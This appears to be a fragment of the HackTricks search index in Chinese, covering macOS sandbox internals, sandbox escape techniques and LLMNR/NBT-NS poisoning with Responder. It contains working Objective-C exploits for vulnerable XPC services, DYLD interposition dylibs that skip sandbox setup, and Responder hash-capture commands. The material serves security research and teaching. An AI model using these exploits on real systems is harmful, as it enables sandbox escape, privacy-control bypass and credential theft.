mac-ports (got from launchd with an api)\\nsbtool file /tmp #Check file access\\nsbtool inspect #Gives you an explanation of the sandbox profile and extensions\\nsbtool all","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » 检查 PID 权限","id":"2597","title":"检查 PID 权限"},"2598":{"body":"也可以使用 libsystem_sandbox.dylib 中的 sandbox_suspend 和 sandbox_unsuspend 函数来暂停和恢复沙箱。 请注意,调用暂停函数时会检查一些权限,以授权调用者调用它,例如: com.apple.private.security.sandbox-manager com.apple.security.print com.apple.security.temporary-exception.audio-unit-host","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » [un]suspend","id":"2598","title":"[un]suspend"},"2599":{"body":"此系统调用 (#381) 期望第一个参数为一个字符串,指示要运行的模块,然后第二个参数为一个代码,指示要运行的函数。第三个参数将取决于执行的函数。 函数 ___sandbox_ms 调用包装了 mac_syscall,在第一个参数中指示 \\"Sandbox\\",就像 ___sandbox_msp 是 mac_set_proc (#387) 的包装器一样。然后,___sandbox_ms 支持的一些代码可以在此表中找到: set_profile (#0) : 将编译或命名的配置文件应用于进程。 platform_policy (#1) : 强制执行特定于平台的策略检查(在 macOS 和 iOS 之间有所不同)。 check_sandbox (#2) : 执行特定沙箱操作的手动检查。 note (#3) : 向沙箱添加注释。 container (#4) : 向沙箱附加注释,通常用于调试或识别。 extension_issue (#5) : 为进程生成新扩展。 extension_consume (#6) : 消耗给定的扩展。 extension_release (#7) : 释放与已消耗扩展相关的内存。 extension_update_file (#8) : 修改沙箱内现有文件扩展的参数。 extension_twiddle (#9) : 调整或修改现有文件扩展(例如,TextEdit、rtf、rtfd)。 suspend (#10) : 暂时暂停所有沙箱检查(需要适当的权限)。 unsuspend (#11) : 恢复所有先前暂停的沙箱检查。 passthrough_access (#12) : 允许直接通过访问资源,绕过沙箱检查。 set_container_path (#13) : (仅限 iOS)为应用组或签名 ID 设置容器路径。 container_map (#14) : (仅限 iOS)从 containermanagerd 检索容器路径。 sandbox_user_state_item_buffer_send (#15) : (iOS 10+)在沙箱中设置用户模式元数据。 inspect (#16) : 提供有关沙箱进程的调试信息。 dump (#18) : (macOS 11)转储沙箱的当前配置文件以供分析。 vtrace (#19) : 跟踪沙箱操作以进行监控或调试。 builtin_profile_deactivate (#20) : (macOS < 11)停用命名配置文件(例如,pe_i_can_has_debugger)。 check_bulk (#21) : 在一次调用中执行多个 sandbox_check 操作。 reference_retain_by_audit_token (#28) : 为审计令牌创建引用,以便在沙箱检查中使用。 reference_release (#29) : 释放先前保留的审计令牌引用。 rootless_allows_task_for_pid (#30) : 验证是否允许 task_for_pid(类似于 csr 检查)。 rootless_whitelist_push (#31) : (macOS)应用系统完整性保护(SIP)清单文件。 rootless_whitelist_check (preflight) (#32) : 在执行之前检查 SIP 清单文件。 rootless_protected_volume (#33) : (macOS)对磁盘或分区应用 SIP 保护。 rootless_mkdir_protected (#34) : 对目录创建过程应用 SIP/DataVault 保护。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » mac_syscall","id":"2599","title":"mac_syscall"},"26":{"body":"你是否对想要攻击的机器有 物理访问 ?你应该阅读一些关于 物理攻击的技巧 和其他关于 从GUI应用程序逃脱 的内容。","breadcrumbs":"Pentesting Methodology » 0- 物理攻击","id":"26","title":"0- 物理攻击"},"260":{"body":"LLMNR, NBT-NS 和 mDNS : 微软和其他操作系统在 DNS 失败时使用 LLMNR 和 NBT-NS 进行本地名称解析。类似地,苹果和 Linux 系统使用 mDNS。 由于这些协议在 UDP 上的未认证广播特性,它们容易受到拦截和欺骗。 Responder 可用于通过向查询这些协议的主机发送伪造响应来冒充服务。 有关使用 Responder 进行服务冒充的更多信息,请参见 这里 。","breadcrumbs":"Pentesting Network » Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks » 本地主机解析协议","id":"260","title":"本地主机解析协议"},"2600":{"body":"请注意,在 iOS 中,内核扩展包含 硬编码的所有配置文件 ,以避免被修改。以下是内核扩展中的一些有趣函数: hook_policy_init : 它钩住 mpo_policy_init,并在 mac_policy_register 之后调用。它执行沙箱的大部分初始化。它还初始化 SIP。 hook_policy_initbsd : 它设置 sysctl 接口,注册 security.mac.sandbox.sentinel、security.mac.sandbox.audio_active 和 security.mac.sandbox.debug_mode(如果以 PE_i_can_has_debugger 启动)。 hook_policy_syscall : 它由 mac_syscall 调用,第一个参数为 \\"Sandbox\\",第二个参数为指示操作的代码。使用 switch 来根据请求的代码查找要运行的代码。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » Sandbox.kext","id":"2600","title":"Sandbox.kext"},"2601":{"body":"Sandbox.kext 通过 MACF 使用了超过一百个钩子。大多数钩子只会检查一些微不足道的情况,如果允许执行该操作,则会调用 cred_sb_evalutate ,并传入来自 MACF 的 凭据 和一个对应于要执行的 操作 的数字,以及一个用于输出的 缓冲区 。 一个很好的例子是函数 _mpo_file_check_mmap ,它钩住了 mmap ,并将开始检查新内存是否可写(如果不可写则允许执行),然后检查它是否用于 dyld 共享缓存,如果是,则允许执行,最后调用 sb_evaluate_internal (或其包装器之一)以执行进一步的允许检查。 此外,在沙箱使用的数百个钩子中,有三个特别有趣: mpo_proc_check_for: 如果需要并且之前未应用,则应用配置文件。 mpo_vnode_check_exec: 当进程加载相关二进制文件时调用,然后执行配置文件检查,并检查禁止 SUID/SGID 执行。 mpo_cred_label_update_execve: 当标签被分配时调用。这是最长的一个,因为它在二进制文件完全加载但尚未执行时调用。它将执行诸如创建沙箱对象、将沙箱结构附加到 kauth 凭据、移除对 mach 端口的访问等操作。 请注意, _cred_sb_evalutate 是 sb_evaluate_internal 的包装器,该函数获取传递的凭据,然后使用 eval 函数执行评估,该函数通常评估默认应用于所有进程的 平台配置文件 ,然后是 特定进程配置文件 。请注意,平台配置文件是 SIP 在 macOS 中的主要组成部分之一。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » MACF Hooks","id":"2601","title":"MACF Hooks"},"2602":{"body":"沙箱还有一个用户守护进程,暴露了 XPC Mach 服务 com.apple.sandboxd 并绑定特殊端口 14 (HOST_SEATBELT_PORT),内核扩展使用该端口与其通信。它通过 MIG 暴露了一些函数。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » Sandboxd","id":"2602","title":"Sandboxd"},"2603":{"body":"*OS Internals Volume III tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » References","id":"2603","title":"References"},"2604":{"body":"Reading time: 4 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 在此页面中,您可以找到如何创建一个应用程序,以便从默认的 macOS 沙箱内部启动任意命令: 编译应用程序: main.m #include int main(int argc, const char * argv[]) {\\n@autoreleasepool {\\nwhile (true) {\\nchar input[512]; printf(\\"Enter command to run (or \'exit\' to quit): \\");\\nif (fgets(input, sizeof(input), stdin) == NULL) {\\nbreak;\\n} // Remove newline character\\nsize_t len = strlen(input);\\nif (len > 0 && input[len - 1] == \'\\\\n\') {\\ninput[len - 1] = \'\\\\0\';\\n} if (strcmp(input, \\"exit\\") == 0) {\\nbreak;\\n} system(input);\\n}\\n}\\nreturn 0;\\n} 编译运行: clang -framework Foundation -o SandboxedShellApp main.m 构建 .app 包 bash mkdir -p SandboxedShellApp.app/Contents/MacOS\\nmv SandboxedShellApp SandboxedShellApp.app/Contents/MacOS/ cat << EOF > SandboxedShellApp.app/Contents/Info.plist\\n\\n\\n\\n\\nCFBundleIdentifier\\ncom.example.SandboxedShellApp\\nCFBundleName\\nSandboxedShellApp\\nCFBundleVersion\\n1.0\\nCFBundleExecutable\\nSandboxedShellApp\\n\\n\\nEOF 定义权限 sandbox\\nsandbox + downloads bash cat << EOF > entitlements.plist\\n\\n\\n\\n\\ncom.apple.security.app-sandbox\\n\\n\\n\\nEOF bash cat << EOF > entitlements.plist\\n\\n\\n\\n\\ncom.apple.security.app-sandbox\\n\\ncom.apple.security.files.downloads.read-write\\n\\n\\n\\nEOF 签署应用程序(您需要在钥匙串中创建一个证书) bash codesign --entitlements entitlements.plist -s \\"YourIdentity\\" SandboxedShellApp.app\\n./SandboxedShellApp.app/Contents/MacOS/SandboxedShellApp # An d in case you need this in the future\\ncodesign --remove-signature SandboxedShellApp.app tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » macOS Default Sandbox Debug » macOS 默认沙箱调试","id":"2604","title":"macOS 默认沙箱调试"},"2605":{"body":"Reading time: 19 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » macOS Sandbox Debug & Bypass » macOS Sandbox Debug & Bypass","id":"2605","title":"macOS Sandbox Debug & Bypass"},"2606":{"body":"图片来自 http://newosxbook.com/files/HITSB.pdf 在前面的图像中,可以观察到 沙箱将如何加载 当运行具有权限 com.apple.security.app-sandbox 的应用程序时。 编译器将链接 /usr/lib/libSystem.B.dylib 到二进制文件。 然后, libSystem.B 将调用其他几个函数,直到 xpc_pipe_routine 将应用程序的权限发送到 securityd 。Securityd 检查该进程是否应该在沙箱内进行隔离,如果是,它将被隔离。 最后,沙箱将通过调用 __sandbox_ms 激活,该调用将调用 __mac_syscall 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » macOS Sandbox Debug & Bypass » Sandbox loading process","id":"2606","title":"Sandbox loading process"},"2607":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » macOS Sandbox Debug & Bypass » 可能的绕过方法","id":"2607","title":"可能的绕过方法"},"2608":{"body":"沙箱进程创建的文件 会附加 隔离属性 以防止沙箱逃逸。然而,如果你设法在沙箱应用程序内 创建一个没有隔离属性的 .app 文件夹 ,你可以使应用程序包的二进制文件指向 /bin/bash 并在 plist 中添加一些环境变量,以利用 open 来 启动新的未沙箱应用程序 。 这就是在 CVE-2023-32364 ** 中所做的。** caution 因此,目前,如果你仅能创建一个以 .app 结尾且没有隔离属性的文件夹,你可以逃离沙箱,因为 macOS 只 检查 .app 文件夹 和 主可执行文件 中的 隔离 属性(我们将主可执行文件指向 /bin/bash )。 请注意,如果一个 .app 包已经被授权运行(它具有带有授权运行标志的隔离 xttr),你也可以利用它……只是现在你不能在 .app 包内写入,除非你拥有一些特权 TCC 权限(在高沙箱内你将没有这些权限)。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » macOS Sandbox Debug & Bypass » 绕过隔离属性","id":"2608","title":"绕过隔离属性"},"2609":{"body":"在 Word 沙箱绕过的最后示例 中可以看到如何利用 open CLI 功能来绕过沙箱。 macOS Office Sandbox Bypasses","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » macOS Sandbox Debug & Bypass » 利用 Open 功能","id":"2609","title":"利用 Open 功能"},"261":{"body":"WPAD 允许浏览器自动发现代理设置。 通过 DHCP、DNS 或在 DNS 失败时回退到 LLMNR 和 NBT-NS 来促进发现。 Responder 可以自动化 WPAD 攻击,将客户端引导到恶意 WPAD 服务器。","breadcrumbs":"Pentesting Network » Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks » Web 代理自动发现协议 (WPAD)","id":"261","title":"Web 代理自动发现协议 (WPAD)"},"2610":{"body":"即使一个应用程序 旨在被沙箱化 (com.apple.security.app-sandbox),如果它 从 LaunchAgent 执行 (例如 ~/Library/LaunchAgents),也可以绕过沙箱。 正如在 这篇文章 中所解释的,如果你想要在一个沙箱应用程序中获得持久性,你可以使其作为 LaunchAgent 自动执行,并可能通过 DyLib 环境变量注入恶意代码。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » macOS Sandbox Debug & Bypass » 启动代理/守护进程","id":"2610","title":"启动代理/守护进程"},"2611":{"body":"如果一个沙箱进程可以 写入 一个 稍后将运行二进制文件的未沙箱应用程序 的位置,它将能够 通过将二进制文件放置在那里 来逃离。此类位置的一个好例子是 ~/Library/LaunchAgents 或 /System/Library/LaunchDaemons。 为此,你可能需要 2 步 :使一个具有 更宽松沙箱 (file-read*, file-write*) 的进程执行你的代码,该代码实际上将在一个 未沙箱执行 的位置写入。 查看此页面关于 自动启动位置 : macOS Auto Start","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » macOS Sandbox Debug & Bypass » 利用自动启动位置","id":"2611","title":"利用自动启动位置"},"2612":{"body":"如果从沙箱进程中你能够 破坏其他在限制较少的沙箱中运行的进程 (或没有沙箱),你将能够逃离它们的沙箱: macOS Process Abuse","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » macOS Sandbox Debug & Bypass » 利用其他进程","id":"2612","title":"利用其他进程"},"2613":{"body":"沙箱还允许通过在配置文件 application.sb 中定义的 XPC 与某些 Mach 服务 进行通信。如果你能够 利用 其中一个服务,你可能能够 逃离沙箱 。 正如在 这篇文章 中所指出的,关于 Mach 服务的信息存储在 /System/Library/xpc/launchd.plist 中。可以通过在该文件中搜索 SystemUser 来找到所有系统和用户 Mach 服务。 此外,可以通过调用 bootstrap_look_up 来检查某个 Mach 服务是否可用于沙箱应用程序: objectivec void checkService(const char *serviceName) {\\nmach_port_t service_port = MACH_PORT_NULL;\\nkern_return_t err = bootstrap_look_up(bootstrap_port, serviceName, &service_port);\\nif (!err) {\\nNSLog(@\\"available service:%s\\", serviceName);\\nmach_port_deallocate(mach_task_self_, service_port);\\n}\\n} void print_available_xpc(void) {\\nNSDictionary* dict = [NSDictionary dictionaryWithContentsOfFile:@\\"/System/Library/xpc/launchd.plist\\"];\\nNSDictionary* launchDaemons = dict[@\\"LaunchDaemons\\"];\\nfor (NSString* key in launchDaemons) {\\nNSDictionary* job = launchDaemons[key];\\nNSDictionary* machServices = job[@\\"MachServices\\"];\\nfor (NSString* serviceName in machServices) {\\ncheckService(serviceName.UTF8String);\\n}\\n}\\n}","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » macOS Sandbox Debug & Bypass » 可用的系统和用户 Mach 服务","id":"2613","title":"可用的系统和用户 Mach 服务"},"2614":{"body":"这些 Mach 服务最初被滥用以 逃离沙盒在这篇文章中 。那时, 应用程序及其框架所需的所有 XPC 服务 都在应用程序的 PID 域中可见(这些是 ServiceType 为 Application 的 Mach 服务)。 为了 联系一个 PID 域 XPC 服务 ,只需在应用程序中注册它,使用如下代码: objectivec [[NSBundle bundleWithPath:@“/System/Library/PrivateFrameworks/ShoveService.framework\\"]load]; 此外,可以通过在 System/Library/xpc/launchd.plist 中搜索 Application 来找到所有 Application Mach 服务。 找到有效的 xpc 服务的另一种方法是检查以下内容: bash find /System/Library/Frameworks -name \\"*.xpc\\"\\nfind /System/Library/PrivateFrameworks -name \\"*.xpc\\" 几个滥用此技术的示例可以在 原始报告 中找到,然而,以下是一些总结的示例。 /System/Library/PrivateFrameworks/StorageKit.framework/XPCServices/storagekitfsrunner.xpc 此服务通过始终返回 YES 来允许每个 XPC 连接,方法 runTask:arguments:withReply: 执行任意命令和任意参数。 该漏洞的利用“简单到”: objectivec @protocol SKRemoteTaskRunnerProtocol\\n-(void)runTask:(NSURL *)task arguments:(NSArray *)args withReply:(void (^)(NSNumber *, NSError *))reply;\\n@end void exploit_storagekitfsrunner(void) {\\n[[NSBundle bundleWithPath:@\\"/System/Library/PrivateFrameworks/StorageKit.framework\\"] load];\\nNSXPCConnection * conn = [[NSXPCConnection alloc] initWithServiceName:@\\"com.apple.storagekitfsrunner\\"];\\nconn.remoteObjectInterface = [NSXPCInterface interfaceWithProtocol:@protocol(SKRemoteTaskRunnerProtocol)];\\n[conn setInterruptionHandler:^{NSLog(@\\"connection interrupted!\\");}];\\n[conn setInvalidationHandler:^{NSLog(@\\"connection invalidated!\\");}];\\n[conn resume]; [[conn remoteObjectProxy] runTask:[NSURL fileURLWithPath:@\\"/usr/bin/touch\\"] arguments:@[@\\"/tmp/sbx\\"] withReply:^(NSNumber *bSucc, NSError *error) {\\nNSLog(@\\"run task result:%@, error:%@\\", bSucc, error);\\n}];\\n} /System/Library/PrivateFrameworks/AudioAnalyticsInternal.framework/XPCServices/AudioAnalyticsHelperService.xpc 这个 XPC 服务允许每个客户端总是返回 YES,方法 createZipAtPath:hourThreshold:withReply: 基本上允许指示要压缩的文件夹路径,并将其压缩为 ZIP 文件。 因此,可以生成一个虚假的应用程序文件夹结构,压缩它,然后解压并执行,以逃离沙盒,因为新文件将没有隔离属性。 漏洞是: objectivec @protocol AudioAnalyticsHelperServiceProtocol\\n-(void)pruneZips:(NSString *)path hourThreshold:(int)threshold withReply:(void (^)(id *))reply;\\n-(void)createZipAtPath:(NSString *)path hourThreshold:(int)threshold withReply:(void (^)(id *))reply;\\n@end\\nvoid exploit_AudioAnalyticsHelperService(void) {\\nNSString *currentPath = NSTemporaryDirectory();\\nchdir([currentPath UTF8String]);\\nNSLog(@\\"======== preparing payload at the current path:%@\\", currentPath);\\nsystem(\\"mkdir -p compressed/poc.app/Contents/MacOS; touch 1.json\\");\\n[@\\"#!/bin/bash\\\\ntouch /tmp/sbx\\\\n\\" writeToFile:@\\"compressed/poc.app/Contents/MacOS/poc\\" atomically:YES encoding:NSUTF8StringEncoding error:0];\\nsystem(\\"chmod +x compressed/poc.app/Contents/MacOS/poc\\"); [[NSBundle bundleWithPath:@\\"/System/Library/PrivateFrameworks/AudioAnalyticsInternal.framework\\"] load];\\nNSXPCConnection * conn = [[NSXPCConnection alloc] initWithServiceName:@\\"com.apple.internal.audioanalytics.helper\\"];\\nconn.remoteObjectInterface = [NSXPCInterface interfaceWithProtocol:@protocol(AudioAnalyticsHelperServiceProtocol)];\\n[conn resume]; [[conn remoteObjectProxy] createZipAtPath:currentPath hourThreshold:0 withReply:^(id *error){\\nNSDirectoryEnumerator *dirEnum = [[[NSFileManager alloc] init] enumeratorAtPath:currentPath];\\nNSString *file;\\nwhile ((file = [dirEnum nextObject])) {\\nif ([[file pathExtension] isEqualToString: @\\"zip\\"]) {\\n// open the zip\\nNSString *cmd = [@\\"open \\" stringByAppendingString:file];\\nsystem([cmd UTF8String]); sleep(3); // wait for decompression and then open the payload (poc.app)\\nNSString *cmd2 = [NSString stringWithFormat:@\\"open /Users/%@/Downloads/%@/poc.app\\", NSUserName(), [file stringByDeletingPathExtension]];\\nsystem([cmd2 UTF8String]);\\nbreak;\\n}\\n}\\n}];\\n} /System/Library/PrivateFrameworks/WorkflowKit.framework/XPCServices/ShortcutsFileAccessHelper.xpc 这个 XPC 服务允许通过方法 extendAccessToURL:completion: 为 XPC 客户端提供对任意 URL 的读写访问,该方法接受任何连接。由于 XPC 服务具有 FDA,因此可以滥用这些权限以完全绕过 TCC。 漏洞是: objectivec @protocol WFFileAccessHelperProtocol\\n- (void) extendAccessToURL:(NSURL *) url completion:(void (^) (FPSandboxingURLWrapper *, NSError *))arg2;\\n@end\\ntypedef int (*PFN)(const char *);\\nvoid expoit_ShortcutsFileAccessHelper(NSString *target) {\\n[[NSBundle bundleWithPath:@\\"/System/Library/PrivateFrameworks/WorkflowKit.framework\\"]load];\\nNSXPCConnection * conn = [[NSXPCConnection alloc] initWithServiceName:@\\"com.apple.WorkflowKit.ShortcutsFileAccessHelper\\"];\\nconn.remoteObjectInterface = [NSXPCInterface interfaceWithProtocol:@protocol(WFFileAccessHelperProtocol)];\\n[conn.remoteObjectInterface setClasses:[NSSet setWithArray:@[[NSError class], objc_getClass(\\"FPSandboxingURLWrapper\\")]] forSelector:@selector(extendAccessToURL:completion:) argumentIndex:0 ofReply:1];\\n[conn resume]; [[conn remoteObjectProxy] extendAccessToURL:[NSURL fileURLWithPath:target] completion:^(FPSandboxingURLWrapper *fpWrapper, NSError *error) {\\nNSString *sbxToken = [[NSString alloc] initWithData:[fpWrapper scope] encoding:NSUTF8StringEncoding];\\nNSURL *targetURL = [fpWrapper url]; void *h = dlopen(\\"/usr/lib/system/libsystem_sandbox.dylib\\", 2);\\nPFN sandbox_extension_consume = (PFN)dlsym(h, \\"sandbox_extension_consume\\");\\nif (sandbox_extension_consume([sbxToken UTF8String]) == -1)\\nNSLog(@\\"Fail to consume the sandbox token:%@\\", sbxToken);\\nelse {\\nNSLog(@\\"Got the file R&W permission with sandbox token:%@\\", sbxToken);\\nNSLog(@\\"Read the target content:%@\\", [NSData dataWithContentsOfURL:targetURL]);\\n}\\n}];\\n}","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » macOS Sandbox Debug & Bypass » 可用的 PID Mach 服务","id":"2614","title":"可用的 PID Mach 服务"},"2615":{"body":"这项研究 发现了绕过沙箱的两种方法。因为沙箱是在用户空间中加载 libSystem 库时应用的。如果一个二进制文件能够避免加载它,它将永远不会被沙箱化: 如果二进制文件是 完全静态编译 的,它可以避免加载该库。 如果 二进制文件不需要加载任何库 (因为链接器也在 libSystem 中),它就不需要加载 libSystem。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » macOS Sandbox Debug & Bypass » 静态编译与动态链接","id":"2615","title":"静态编译与动态链接"},"2616":{"body":"请注意, 即使是 shellcodes 在 ARM64 中也需要链接到 libSystem.dylib: bash ld -o shell shell.o -macosx_version_min 13.0\\nld: dynamic executables or dylibs must link with libSystem.dylib for architecture arm64","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » macOS Sandbox Debug & Bypass » Shellcodes","id":"2616","title":"Shellcodes"},"2617":{"body":"正如在 这篇文章的附加内容 中所解释的,沙箱限制如: (version 1)\\n(allow default)\\n(deny file-write* (literal \\"/private/tmp/sbx\\")) 可以通过一个新进程执行来绕过,例如: bash mkdir -p /tmp/poc.app/Contents/MacOS\\necho \'#!/bin/sh\\\\n touch /tmp/sbx\' > /tmp/poc.app/Contents/MacOS/poc\\nchmod +x /tmp/poc.app/Contents/MacOS/poc\\nopen /tmp/poc.app 然而,当然,这个新进程不会从父进程继承权限或特权。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » macOS Sandbox Debug & Bypass » 不继承的限制","id":"2617","title":"不继承的限制"},"2618":{"body":"请注意,即使某些 操作 可能在沙箱中被 允许 ,如果应用程序具有特定的 权限 ,例如: scheme (when (entitlement \\"com.apple.security.network.client\\")\\n(allow network-outbound (remote ip))\\n(allow mach-lookup\\n(global-name \\"com.apple.airportd\\")\\n(global-name \\"com.apple.cfnetwork.AuthBrokerAgent\\")\\n(global-name \\"com.apple.cfnetwork.cfnetworkagent\\")\\n[...]","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » macOS Sandbox Debug & Bypass » 权限","id":"2618","title":"权限"},"2619":{"body":"有关 Interposting 的更多信息,请查看: macOS Function Hooking Interpost _libsecinit_initializer 以防止沙盒 c // gcc -dynamiclib interpose.c -o interpose.dylib #include void _libsecinit_initializer(void); void overriden__libsecinit_initializer(void) {\\nprintf(\\"_libsecinit_initializer called\\\\n\\");\\n} __attribute__((used, section(\\"__DATA,__interpose\\"))) static struct {\\nvoid (*overriden__libsecinit_initializer)(void);\\nvoid (*_libsecinit_initializer)(void);\\n}\\n_libsecinit_initializer_interpose = {overriden__libsecinit_initializer, _libsecinit_initializer}; bash DYLD_INSERT_LIBRARIES=./interpose.dylib ./sand\\n_libsecinit_initializer called\\nSandbox Bypassed! 通过 __mac_syscall 进行插桩以防止沙盒 interpose.c // gcc -dynamiclib interpose.c -o interpose.dylib #include \\n#include // Forward Declaration\\nint __mac_syscall(const char *_policyname, int _call, void *_arg); // Replacement function\\nint my_mac_syscall(const char *_policyname, int _call, void *_arg) {\\nprintf(\\"__mac_syscall invoked. Policy: %s, Call: %d\\\\n\\", _policyname, _call);\\nif (strcmp(_policyname, \\"Sandbox\\") == 0 && _call == 0) {\\nprintf(\\"Bypassing Sandbox initiation.\\\\n\\");\\nreturn 0; // pretend we did the job without actually calling __mac_syscall\\n}\\n// Call the original function for other cases\\nreturn __mac_syscall(_policyname, _call, _arg);\\n} // Interpose Definition\\nstruct interpose_sym {\\nconst void *replacement;\\nconst void *original;\\n}; // Interpose __mac_syscall with my_mac_syscall\\n__attribute__((used)) static const struct interpose_sym interposers[] __attribute__((section(\\"__DATA, __interpose\\"))) = {\\n{ (const void *)my_mac_syscall, (const void *)__mac_syscall },\\n}; bash DYLD_INSERT_LIBRARIES=./interpose.dylib ./sand __mac_syscall invoked. Policy: Sandbox, Call: 2\\n__mac_syscall invoked. Policy: Sandbox, Call: 2\\n__mac_syscall invoked. Policy: Sandbox, Call: 0\\nBypassing Sandbox initiation.\\n__mac_syscall invoked. Policy: Quarantine, Call: 87\\n__mac_syscall invoked. Policy: Sandbox, Call: 4\\nSandbox Bypassed!","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » macOS Sandbox Debug & Bypass » Interposting Bypass","id":"2619","title":"Interposting Bypass"},"262":{"body":"Responder 是一个用于中毒 LLMNR、NBT-NS 和 mDNS 查询的工具,根据查询类型选择性响应,主要针对 SMB 服务。 它在 Kali Linux 中预装,可在 /etc/responder/Responder.conf 中配置。 Responder 在屏幕上显示捕获的哈希并将其保存在 /usr/share/responder/logs 目录中。 它支持 IPv4 和 IPv6。 Windows 版本的 Responder 可在 这里 获取。 运行 Responder 使用默认设置运行 Responder:responder -I 进行更激进的探测(可能有副作用):responder -I -P -r -v 捕获 NTLMv1 挑战/响应以便于破解的技术:responder -I --lm --disable-ess 可以通过以下命令激活 WPAD 冒充:responder -I --wpad NetBIOS 请求可以解析为攻击者的 IP,并可以设置身份验证代理:responder.py -I -Pv","breadcrumbs":"Pentesting Network » Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks » Responder 用于协议中毒","id":"262","title":"Responder 用于协议中毒"},"2620":{"body":"让我们编译一个应该被沙箱保护的应用程序: sand.c\\nentitlements.xml\\nInfo.plist c #include \\nint main() {\\nsystem(\\"cat ~/Desktop/del.txt\\");\\n} xml \\n\\ncom.apple.security.app-sandbox\\n\\n\\n xml \\n\\nCFBundleIdentifier\\nxyz.hacktricks.sandbox\\nCFBundleName\\nSandbox\\n\\n 然后编译应用程序: bash # Compile it\\ngcc -Xlinker -sectcreate -Xlinker __TEXT -Xlinker __info_plist -Xlinker Info.plist sand.c -o sand # Create a certificate for \\"Code Signing\\" # Apply the entitlements via signing\\ncodesign -s --entitlements entitlements.xml sand caution 应用程序将尝试 读取 文件 ~/Desktop/del.txt ,而 Sandbox 不允许 。 在那里创建一个文件,因为一旦绕过 Sandbox,它将能够读取它: echo \\"Sandbox Bypassed\\" > ~/Desktop/del.txt 让我们调试应用程序,看看 Sandbox 何时加载: bash # Load app in debugging\\nlldb ./sand # Set breakpoint in xpc_pipe_routine\\n(lldb) b xpc_pipe_routine # run\\n(lldb) r # This breakpoint is reached by different functionalities\\n# Check in the backtrace is it was de sandbox one the one that reached it\\n# We are looking for the one libsecinit from libSystem.B, like the following one:\\n(lldb) bt\\n* thread #1, queue = \'com.apple.main-thread\', stop reason = breakpoint 1.1\\n* frame #0: 0x00000001873d4178 libxpc.dylib`xpc_pipe_routine\\nframe #1: 0x000000019300cf80 libsystem_secinit.dylib`_libsecinit_appsandbox + 584\\nframe #2: 0x00000001874199c4 libsystem_trace.dylib`_os_activity_initiate_impl + 64\\nframe #3: 0x000000019300cce4 libsystem_secinit.dylib`_libsecinit_initializer + 80\\nframe #4: 0x0000000193023694 libSystem.B.dylib`libSystem_initializer + 272 # To avoid lldb cutting info\\n(lldb) settings set target.max-string-summary-length 10000 # The message is in the 2 arg of the xpc_pipe_routine function, get it with:\\n(lldb) p (char *) xpc_copy_description($x1)\\n(char *) $0 = 0x000000010100a400 \\" { count = 5, transaction: 0, voucher = 0x0, contents 